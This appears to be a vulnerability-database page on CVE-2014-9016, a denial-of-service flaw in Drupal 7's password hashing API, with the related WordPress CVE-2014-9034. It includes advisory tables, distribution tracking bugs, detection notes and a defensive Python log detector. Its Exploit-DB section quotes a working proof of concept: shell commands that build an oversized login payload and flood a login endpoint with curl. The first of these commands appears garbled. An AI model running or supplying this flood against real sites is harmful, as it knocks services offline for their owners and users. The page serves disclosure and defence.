CVE-2014-9016
Published 2014-11-24
Priority P3 · 49 · medium · 5 (CVSS 2.0) · AV:N/AC:L/Au:N/C:N/I:N/A:P
Exploit available · EPSS 82.70% (99.6th percentile)
The password hashing API in Drupal 7.x before 7.34 and the Secure Password Hashes (aka phpass) module 6.x-2.x before 6.x-2.1 for Drupal allows remote attackers to cause a denial of service (CPU and memory consumption) via a crafted request.
Affected (18 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | wordpress | < wordpress 4.0.1+dfsg-1 (bookworm) | wordpress 4.0.1+dfsg-1 (bookworm) |
| drupal | drupal | >= 7.0 < 7.34 | 7.34 |
| secure_password_hashes_project | secure_passwords_hashes | >= 6.x-2.0 < 6.x-2.1 | 6.x-2.1 |
| wordpress | wordpress | <= 3.7.4 | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | >= 0 < 4.0.1+dfsg-1 | 4.0.1+dfsg-1 |
Detection & IOCs (extracted from sources)
- Monitor for abnormally large POST body sizes targeting Drupal login endpoints (e.g., /?q=user or /user/login): the DoS payload is a valid credential payload with a large repeated string appended, so megabytes of password data are sent per request.
- Detect rapid repeated POST requests to the Drupal login form (form_id=user_login) from the same source IP: the PoC sends up to 150 concurrent requests with 0.5 s sleep intervals.
- Alert on sustained CPU exhaustion correlated with login-endpoint POST requests containing extremely long password field values; the vulnerability lies in the password hashing API and is triggered by specially crafted requests.
- This vulnerability can be exploited by anonymous (unauthenticated) users, so rate-limiting or blocking unauthenticated login POST requests with oversized bodies is an effective mitigation.
- A Metasploit auxiliary module for this DoS is available in the framework, which may be used for automated exploitation at scale.
- CVE-2014-9016 is specific to Drupal 7's password hashing API (SA-CORE-2014-006), while the closely related CVE-2014-9034 affects WordPress's wp-includes/class-phpass.php; detection rules should cover both platforms' login endpoints.
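As an added, defensive example (not code from the page or from any of the listed sources), the following Python implements the first two signals above over constructed access-log lines. The log format (nginx "combined" with `$request_length` appended), the endpoint list and the thresholds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
# Login endpoints from the notes above (Drupal) plus WordPress's (same bug: CVE-2014-9034).
LOGIN_PATHS = re.compile(r"^(/\?q=user(/login)?|/user(/login)?|/wp-login\.php)(\?.*)?$")
# Assumed log format: nginx "combined" with $request_length appended as the last field.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d{3} (?:\d+|-) "[^"]*" "[^"]*" (?P<reqlen>\d+)$'
)
# Assumed thresholds: a genuine login POST is a few hundred bytes, the PoC body is megabytes;
# the PoC fires a request every 0.5 s, so >10 login POSTs from one IP in 10 s is not a human.
MAX_REQ_LEN = 64 * 1024
BURST_COUNT, BURST_WINDOW_S = 10, 10.0

def parse(line):
    m = LINE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["reqlen"])

def detect(lines):
    """Return sorted (ip, rule) pairs: oversized login POSTs and per-IP login bursts."""
    alerts = set()
    recent = defaultdict(deque)  # ip -> timestamps of its login POSTs inside the window
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, reqlen = rec
        if method != "POST" or not LOGIN_PATHS.match(path):
            continue  # only login-form submissions are in scope for these rules
        if reqlen > MAX_REQ_LEN:
            alerts.add((ip, "oversized_login_post"))
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > BURST_WINDOW_S:
            q.popleft()  # drop timestamps that fell out of the sliding window
        if len(q) > BURST_COUNT:
            alerts.add((ip, "login_post_burst"))
    return sorted(alerts)

def log_line(ip, sec, path="/user/login", reqlen=412):
    # Constructed log line in the assumed format, timestamped 20 Nov 2014 10:00:SS UTC.
    return (f'{ip} - - [20/Nov/2014:10:00:{sec:02d} +0000] "POST {path} HTTP/1.1" '
            f'200 5120 "-" "curl/7.38.0" {reqlen}')
# Constructed sample: a normal login, a large POST to a non-login path (ignored), then the
# PoC pattern: 12 multi-megabyte POSTs to /?q=user, two per second, from a single address.
SAMPLE_LOG = [log_line("203.0.113.5", 0), log_line("203.0.113.9", 1, "/node/add", 3_000_000)]
SAMPLE_LOG += [log_line("198.51.100.7", i // 2, "/?q=user", 2_000_300) for i in range(12)]
```

Running `detect(SAMPLE_LOG)` yields both rules for 198.51.100.7 and nothing for the other two addresses; in production, feed it the live log and forward the alerts to your SIEM or rate limiter.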
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| osv | — | 5.0 | MEDIUM | — |
| vendor_debian | — | 5.0 | MEDIUM | — |
Debian
CVE-2014-9034 (vendor_debian · 2014 · CVSS 5.0 MEDIUM)
wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing, a similar issue to CVE-2014-9016.
Scope: local
bookworm: resolved (fixed in 4.0.1+dfsg-1)
bullseye: resolved (fixed in 4.0.1+dfsg-1)
forky: resolved (fixed in 4.0.1+dfsg-1)
sid: resolved (fixed in 4.0.1+dfsg-1)
trixie: resolved (fixed in 4.0.1+dfsg-1)
GHSA
GHSA-wh45-5f5h-v3mq for CVE-2014-9034 (ghsa_unreviewed · 2022-05-17 · CVSS 5.0 MEDIUM)
Same description as the Debian CVE-2014-9034 entry above.
GHSA
GHSA-cfc7-w9hw-779w for CVE-2014-9016 (ghsa_unreviewed · 2022-05-13 · MEDIUM)
Same description as the CVE-2014-9016 summary at the top of this page.
OSV
CVE-2014-9034 (osv · 2014-11-25 · CVSS 5.0 MEDIUM)
Same description as the Debian CVE-2014-9034 entry above.
OSV
CVE-2014-9016 (osv · 2014-11-24 · CVSS 5.0 MEDIUM)
Same description as the CVE-2014-9016 summary at the top of this page.
No detection rules found.
Exploit-DB
Drupal < 7.34 - Denial of Service (exploitdb · 2014-12-01 · CVE-2014-9016)

```shell
Drupal valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload
```

Perform a DoS with a valid user:

```shell
for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.5; done
```

Authors:
- Javer Nieto, http://www.behindthefirewalls.com
- Andres Rojas, http://www.devconsole.info

References:
- https://wordpress.org/news/2014/11/wordpress-4-0-1/
- https://www.drupal.org/SA-CORE-2014-006
- http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
- http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
- http://www.devconsole.info/?p=1050
Metasploit
WordPress Long Password DoS (metasploit)
WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing.
Bugzilla
CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006) (bugzilla · 2014-11-20 · CVSS 5.0 MEDIUM)
Latest Drupal advisory [1] fixes a denial of service vulnerability.
Drupal 7 includes a password hashing API to ensure that user supplied passwords are not stored in plain text.
A vulnerability in this API allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).
This vulnerability can be exploited by anonymous users.
[1]: https://www.drupal.org/SA-CORE-2014-006
Discussion:
Created drupal7 tracking bugs for this issue:
Affects: fedora-all [bug 1166256]
Affects: epel-all [bug 1166257]
---
drupal7-7.34-1.fc20 has been pushed to the Fedora 20 stable repository. If problems still persis
Bugzilla
CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006) [epel-all] (bugzilla · 2014-11-20 · CVSS 5.0 MEDIUM)
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple
Bugzilla
CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006) [fedora-all] (bugzilla · 2014-11-20 · CVSS 5.0 MEDIUM)
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple sup
References:
- http://secunia.com/advisories/59164
- http://secunia.com/advisories/59814
- http://www.debian.org/security/2014/dsa-3075
- http://www.openwall.com/lists/oss-security/2014/11/20/21
- http://www.openwall.com/lists/oss-security/2014/11/20/3
- http://www.openwall.com/lists/oss-security/2014/11/21/1
- https://www.drupal.org/SA-CORE-2014-006
- https://www.drupal.org/node/2378367
- https://www.drupal.org/node/2378375